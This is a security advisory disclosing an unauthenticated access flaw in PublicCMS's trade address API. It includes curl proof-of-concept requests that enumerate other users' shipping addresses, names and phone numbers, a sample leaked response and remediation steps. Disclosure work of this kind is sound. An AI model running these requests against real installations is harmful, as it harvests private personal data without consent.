PublicCMS Pre-Auth Anonymous Trade Address API Disclosure of Other Users’ Shipping Addresses and Phone Numbers
PublicCMS Pre-Auth Anonymous Trade Address API Disclosure of Other Users’ Shipping Addresses and Phone Numbers
Project: PublicCMS
Repository: https://github.com/sanluan/PublicCMS
Vulnerability ID: VPLUS-2026-24555
Title: Pre-Authentication Anonymous Access in PublicCMS Allows Disclosure of Other Users’ Shipping Addresses and Phone Numbers
Description: A sensitive data exposure vulnerability exists in the PublicCMS trade address query functionality. The affected directives inherit from AbstractTemplateDirective but do not override needAppToken() or needUserToken(), which leaves the following endpoints accessible to unauthenticated users:
/api/directive/trade/addressList/api/directive/trade/address
Because these endpoints do not enforce authentication or authorization, an attacker can query address data belonging to arbitrary users by supplying a userId or address id. The API responses expose TradeAddress entity data directly, including highly sensitive fields such as:
addressaddresseetelephoneuserId
This allows an unauthenticated attacker to enumerate users and retrieve shipping addresses, recipient names, and phone numbers in bulk.
Affected Component: PublicCMS trade module
Affected File: publiccms-trade/src/main/java/com/publiccms/views/directive/trade/TradeAddressListDirective.java
Affected Function: execute
Technical Root Cause: The vulnerable directives rely on AbstractTemplateDirective defaults and do not explicitly require application or user tokens. In addition, the query logic accepts attacker-controlled userId and id parameters without verifying that the requested address belongs to the current authenticated user.
Attack Vector: Remote, unauthenticated attacker sending crafted GET requests.
Example Requests:
GET /api/directive/trade/addressList?userId=6&pageSize=20
GET /api/directive/trade/address?id=4
Proof of Concept:
curl -sS 'http://<host>:8080/api/directive/trade/addressList?userId=6&pageSize=20'
curl -sS 'http://<host>:8080/api/directive/trade/address?id=4'
Observed Behavior: The application returns HTTP 200 and exposes another user’s shipping address information without requiring login, cookies, or tokens.
Example Response:
{"page":{"firstPage":true,"firstResult":0,"lastPage":true,"list":[{"address":"Leak Test Address 1774527292","addressee":"Leak Victim","createDate":1774527294000,"id":4,"telephone":"15500001111","userId":"6"}],"nextPage":1,"pageIndex":1,"pageSize":20,"prePage":1,"prevPage":1,"totalCount":1,"totalPage":1}}
{"object":{"address":"Leak Test Address 1774527292","addressee":"Leak Victim","createDate":1774527294000,"id":4,"telephone":"15500001111","userId":"6"}}
Security Impact: This vulnerability exposes personally identifiable information belonging to other users. Attackers can harvest full shipping addresses, recipient names, and phone numbers without authentication, creating risks of privacy violations, fraud, phishing, social engineering, and large-scale data scraping.
Severity: High
CVSS: 8.1
Remediation Recommendations:
- Require authentication for both address list and address detail directives.
- Enforce authorization checks to ensure users can only access their own address records.
- Do not allow the client to specify arbitrary
userIdvalues for data retrieval. - Minimize serialized output and mask sensitive fields such as phone numbers and addresses.
- Add monitoring, enumeration protection, and rate limiting for sensitive endpoints.